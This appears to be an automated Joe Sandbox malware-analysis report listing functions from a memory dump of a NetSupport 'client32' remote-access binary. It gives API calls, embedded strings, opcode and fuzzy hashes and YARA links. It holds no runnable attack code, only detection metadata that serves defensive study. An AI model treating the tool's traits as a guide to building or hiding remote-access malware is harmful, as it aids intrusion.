                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalEnterFormatMessageSectionclosesocketgethostbynamegethostnameinet_ntoashutdown
                                                                                                                                    • String ID: 127.0.0.1
                                                                                                                                    • API String ID: 3552717344-3619153832
                                                                                                                                    • Opcode ID: e8bc3393b8fd347ca8c821a12a24ff93290f6d224345be98ca8ff566579db64b
                                                                                                                                    • Instruction ID: aa17ea021d3ed84f241b33fe3108128a88572c75fddb31a861601ff691f486d7
                                                                                                                                    • Opcode Fuzzy Hash: e8bc3393b8fd347ca8c821a12a24ff93290f6d224345be98ca8ff566579db64b
                                                                                                                                    • Instruction Fuzzy Hash: C651B675D00758AFDB24CFA4C884B9EFBB8EB08714F00466DE45697680DB75AA48CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110935A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                                                                    • GetWindowLongA.USER32 ref: 110935E9
                                                                                                                                    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    • GetWindowLongA.USER32 ref: 11093640
                                                                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LongWindow$ErrorExitLastMessageProcessVersionwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 3509604568-2830328467
                                                                                                                                    • Opcode ID: bec04fe564d6b3850833210fc124e11f10e4a7d0c7b4bad0230e56c4fe519f4b
                                                                                                                                    • Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
                                                                                                                                    • Opcode Fuzzy Hash: bec04fe564d6b3850833210fc124e11f10e4a7d0c7b4bad0230e56c4fe519f4b
                                                                                                                                    • Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110669B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,20F29797,?,00000000,766DEA30), ref: 110669F0
                                                                                                                                    • SetEvent.KERNEL32 ref: 11066A1A
                                                                                                                                    • timeGetTime.WINMM ref: 11066A53
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 11066A70
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 11066B01
                                                                                                                                    Strings
                                                                                                                                    • Unpausing sessionz %dz, rxpending = %d, lag = %d, pausedfor %d ms, xrefs: 11066ACE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$DecrementEnterEventInterlockedLeaveTimetime
                                                                                                                                    • String ID: Unpausing sessionz %dz, rxpending = %d, lag = %d, pausedfor %d ms
                                                                                                                                    • API String ID: 2700130086-2729525473
                                                                                                                                    • Opcode ID: 78289c07d2d03b1f167936287e590b6e78d781c956d8ca5325c26eb241de2d4c
                                                                                                                                    • Instruction ID: 1ada849b4505749000e7b83adab13521a77fc953e08c4fb887b5ef09327f5e99
                                                                                                                                    • Opcode Fuzzy Hash: 78289c07d2d03b1f167936287e590b6e78d781c956d8ca5325c26eb241de2d4c
                                                                                                                                    • Instruction Fuzzy Hash: 83415875A00A059FD715CFA5C984BABBBF9FB48309F00856DE86A87654D731FA40CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11009500 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 92fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,20F29797), ref: 110095EB
                                                                                                                                    Strings
                                                                                                                                    • IsA(), xrefs: 110095A5, 110095CD
                                                                                                                                    • https://, xrefs: 1100952F
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                                                                                    • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                                                                                    • http://, xrefs: 11009535, 11009548
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite
                                                                                                                                    • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                                                                    • API String ID: 3934441357-3154135529
                                                                                                                                    • Opcode ID: fef67df9685051cc4b1ed36aa93b0141d55110b293a55b901c101e5b45ccdbf6
                                                                                                                                    • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                                                                                    • Opcode Fuzzy Hash: fef67df9685051cc4b1ed36aa93b0141d55110b293a55b901c101e5b45ccdbf6
                                                                                                                                    • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110040F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 11004130
                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 110041A7
                                                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110041D2
                                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 110041FE
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnableWindow$ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 2354609054-2830328467
                                                                                                                                    • Opcode ID: bc77aff694d436de89820df397cf97f2537acd50e9dcce0a0b494a4fafc6c394
                                                                                                                                    • Instruction ID: c13629e3a69401f36b1837560bfd6e90eee75297420fac0ab380ec534ade091b
                                                                                                                                    • Opcode Fuzzy Hash: bc77aff694d436de89820df397cf97f2537acd50e9dcce0a0b494a4fafc6c394
                                                                                                                                    • Instruction Fuzzy Hash: AC318BB5A40309ABE720DF55CC86F9AF3E4FB4C708F108569E91AA7680D7B4B8008B94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1111A9B0 Relevance: 10.6, APIs: 7, Instructions: 80windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 1111A9CF
                                                                                                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 1111A9E5
                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111A9F8
                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111AA05
                                                                                                                                    • CreatePalette.GDI32(00000000), ref: 1111AA2B
                                                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 1111AA6A
                                                                                                                                    • SelectPalette.GDI32(?,?,00000000), ref: 1111AA82
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Palette$Select$DeleteObject$Create
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 620285551-0
                                                                                                                                    • Opcode ID: e2a17db89f6aa745687cb7b3055ccdce1d4da0275d6ba8f5d1f8eeb7d1142810
                                                                                                                                    • Instruction ID: 3ccb78e33d7d17ad93df3071224c441059527d1883299d25e3a7351851f38629
                                                                                                                                    • Opcode Fuzzy Hash: e2a17db89f6aa745687cb7b3055ccdce1d4da0275d6ba8f5d1f8eeb7d1142810
                                                                                                                                    • Instruction Fuzzy Hash: 6C215CB6204705ABE720DAB5DD88FA7F7ECAB88714F114A28E56AC7240DA35F441CB64
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11009620 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 110D1540: wvsprintfA.USER32 ref: 110D1572
                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
                                                                                                                                    • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
                                                                                                                                    • IsA(), xrefs: 1100968D, 110096B5
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
                                                                                                                                    • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                    • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                    • API String ID: 863766397-389219706
                                                                                                                                    • Opcode ID: 4ddacb77b663a9c8880eb35a92b0fe1510f4538de1884f74e96c2c9d4da9a770
                                                                                                                                    • Instruction ID: c29ccd5437a1998bdc0500c50b26c338a4961a37ea6a19b2fc580a4c00e0eec9
                                                                                                                                    • Opcode Fuzzy Hash: 4ddacb77b663a9c8880eb35a92b0fe1510f4538de1884f74e96c2c9d4da9a770
                                                                                                                                    • Instruction Fuzzy Hash: 5A215E75A00219ABDB00DFD5DC41FEEF3B8FF59654F10025AE922B7280EB746504CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110056A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetClientRect.USER32 ref: 110056DD
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 110056E8
                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
                                                                                                                                    • EndPaint.USER32(?,?), ref: 1100572F
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 110056C8
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 1216912278-2830328467
                                                                                                                                    • Opcode ID: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                                                                                    • Instruction ID: 646bbc1308694ba02cb50681d3c8309cd3c635e6896d205317d73ea189e6e8a3
                                                                                                                                    • Opcode Fuzzy Hash: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                                                                                    • Instruction Fuzzy Hash: FA1194B5A40219BFD714CBA0CD85FBEB3BCEB88709F104569F51796584DBB0A904C764
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11002070 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
